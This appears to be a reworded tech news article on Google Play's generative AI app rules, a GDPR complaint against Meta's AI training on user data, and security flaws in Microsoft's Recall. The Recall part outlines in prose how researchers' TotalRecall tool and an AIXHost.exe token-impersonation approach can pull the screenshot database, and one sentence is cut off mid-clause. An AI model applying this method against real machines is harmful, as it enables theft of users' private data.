Google is encouraging Android app developers to responsibly incorporate generative artificial intelligence (GenAI) features according to new guidelines.
The search and advertisement giant’s recent guidance aims to address inappropriate content, such as sexual content and hate speech, produced through these tools.
In order to achieve this, apps utilizing AI to generate content must guarantee they avoid creating Restricted Content, establish a system for users to report or identify offensive material, and market them accurately to reflect the capabilities of the app. App developers are also advised to thoroughly test their AI models to ensure they uphold user safety and privacy.
“Ensure to thoroughly test your apps in diverse user scenarios and protect them from inputs that could exploit the generative AI feature to create detrimental or offensive content,” remarked Prabhat Sharma, director of trust and safety for Google Play, Android, and Chrome, in a statement.
This development follows an investigation by 404 Media that uncovered various apps on the Apple App Store and Google Play Store promoting the creation of non-consensual nude images.
Meta’s Utilization of Public Data for AI Raises Concerns
The extensive adoption of AI technologies has raised broader concerns about privacy and security related to training data and model safety, providing opportunities for malicious actors to extract sensitive data and manipulate models to yield unforeseen outcomes, as highlighted in a report.
Additionally, Meta’s decision to enhance its AI services by leveraging public data from its platforms to develop the “leading recommendation technology” has sparked a complaint initiated by Austrian privacy group noyb in 11 European nations, alleging GDPR privacy law violations within the region.
“This data encompasses public posts, photos, and their associated captions,” the company revealed last month. “In the future, we may also utilize data shared by users during interactions with our generative AI features, such as Meta AI, or with businesses, to enhance and refine our AI products.”
Specifically, noyb has criticized Meta for placing the responsibility on users (making it opt-out rather than opt-in) and withholding sufficient information on how customer data will be utilized.
Meta has indicated that it will be “relying on the legal grounds of ‘Legitimate Interests’ to process specific first and third-party data in the European Region and the United Kingdom to enhance AI capabilities and create better experiences. E.U. users have until June 26 to opt out of this processing, which can be done by submitting a request.
Although the tech giant emphasized its alignment with the practices of other technology firms in improving AI services in Europe, the Norwegian data protection authority Datatilsynet expressed doubts about the legality of this process.
“It would have been more appropriate to seek consent from users before utilizing their posts and photos in this manner,” stated the agency in a declaration.
“Meta has no ‘legitimate interest’ to supersede users’ data protection rights when it comes to advertising, as confirmed by the European Court of Justice. Nevertheless, the company is attempting to leverage the same arguments for the training of unspecified ‘AI technology,'” highlighted noyb’s Max Schrems.
Microsoft’s Recall Faces Heightened Scrutiny
Meta’s ongoing regulatory challenge coincides with Microsoft’s AI-driven feature named Recall, which has faced swift criticism due to privacy and security concerns arising from capturing user activity screenshots on Windows PCs every five seconds to build a searchable archive.
In a recent analysis, security researcher Kevin Beaumont outlined how a malicious actor could potentially deploy an information-stealing technique to extract and
the repository that holds the data extracted from the screenshots. The sole requirement to execute this is the need for administrator permissions on a user’s device.
In a statement, Beaumont stated, “Recall provides threat actors the ability to automatically retrieve everything you’ve accessed within seconds.” Beaumont suggested that Microsoft should recall Recall and revamp it to ensure it lives up to its potential, possibly releasing it at a later time.
Various researchers have also showcased tools like TotalRecall, demonstrating how Recall can be misused to extract highly confidential information from the repository. According to Alexander Hagenah, the creator of TotalRecall, “Windows Recall stores all data locally in an unencrypted SQLite database, with screenshots simply saved in a local folder,” as mentioned.
Effective June 6, 2024, TotalRecall has been updated to eliminate the need for admin privileges, utilizing one of the approaches outlined by security researcher James Forshaw to bypass the admin privilege requirement for accessing Recall data.
Forshaw stated, “Currently, the data is only safeguarded by being accessed control list restricted to SYSTEM and thus any privilege escalation (or non-security boundary *cough*) can result in leaking the information.”
The primary method involves imitating a program named AIXHost.exe by gaining its token or capitalizing on the privileges of the existing user to alter access control lists and secure full access to the repository.
Nevertheless, it is essential to note that Recall is presently in a preview phase, leaving room for Microsoft to make alterations to the application before making it widely accessible to all users later this month. It is anticipated that Recall will be automatically activated for compatible Copilot+ PCs.



